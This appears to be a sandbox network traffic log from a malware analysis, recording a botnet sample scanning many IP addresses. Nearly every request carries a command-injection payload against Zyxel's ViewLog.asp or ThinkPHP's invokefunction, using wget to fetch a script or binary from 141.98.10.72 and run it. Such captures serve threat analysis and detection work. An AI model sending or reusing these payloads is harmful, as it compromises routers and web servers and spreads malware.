                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.113881111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      497192.168.2.155424694.120.2.2088080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.114933014 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      498192.168.2.154865494.122.49.698080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.115092039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      499192.168.2.154060895.86.107.1898080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.120570898 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      500192.168.2.153386485.187.18.588080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.354629993 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.596785069 CET411INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 10:26:24 GMT
                                                      Server: Webs
                                                      X-Frame-Options: SAMEORIGIN
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      501192.168.2.153985685.122.223.1028080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.404129982 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      502192.168.2.155962295.164.16.1368080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.479695082 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      503192.168.2.155877294.173.242.1498080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.528341055 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      504192.168.2.155332494.230.135.1208080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.539211988 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:04.798394918 CET337INHTTP/1.1 405 Not Allowed
                                                      Server: Web server
                                                      Date: Wed, 14 Feb 2024 08:30:03 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 155
                                                      Connection: keep-alive
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      505192.168.2.153653294.120.209.2168080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.602392912 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      506192.168.2.1551690112.13.121.10180
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.630815029 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:05.042491913 CET311INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      507192.168.2.155095485.130.160.1308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.679454088 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:05.065078020 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      508192.168.2.1557990112.124.32.5680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:04.967123985 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:05.290169001 CET337INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.14.1
                                                      Date: Wed, 14 Feb 2024 08:30:05 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 173
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      509192.168.2.155155688.99.36.11980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:06.226730108 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:06.437678099 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:06 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      510192.168.2.155070895.128.42.20280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:06.424087048 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:06.621567011 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      511192.168.2.156021095.67.8.23980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:06.552746058 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:06.784632921 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.18.0
                                                      Date: Wed, 14 Feb 2024 08:30:06 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      512192.168.2.155582295.56.20.1580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:06.605735064 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:06.890832901 CET29INHTTP/1.1 200 OK
                                                      Feb 14, 2024 09:30:06.890868902 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                      Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      513192.168.2.153993695.181.228.16480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:06.794584036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:07.165060997 CET932INHTTP/1.1 400 Bad Request
                                                      Connection: close
                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                      pragma: no-cache
                                                      content-type: text/html
                                                      content-length: 681
                                                      date: Wed, 14 Feb 2024 08:30:07 GMT
                                                      server: LiteSpeed
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      514192.168.2.155071895.128.42.20280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:06.815896988 CET219INHTTP/1.1 400 Bad request
                                                      Content-length: 90
                                                      Cache-Control: no-cache
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
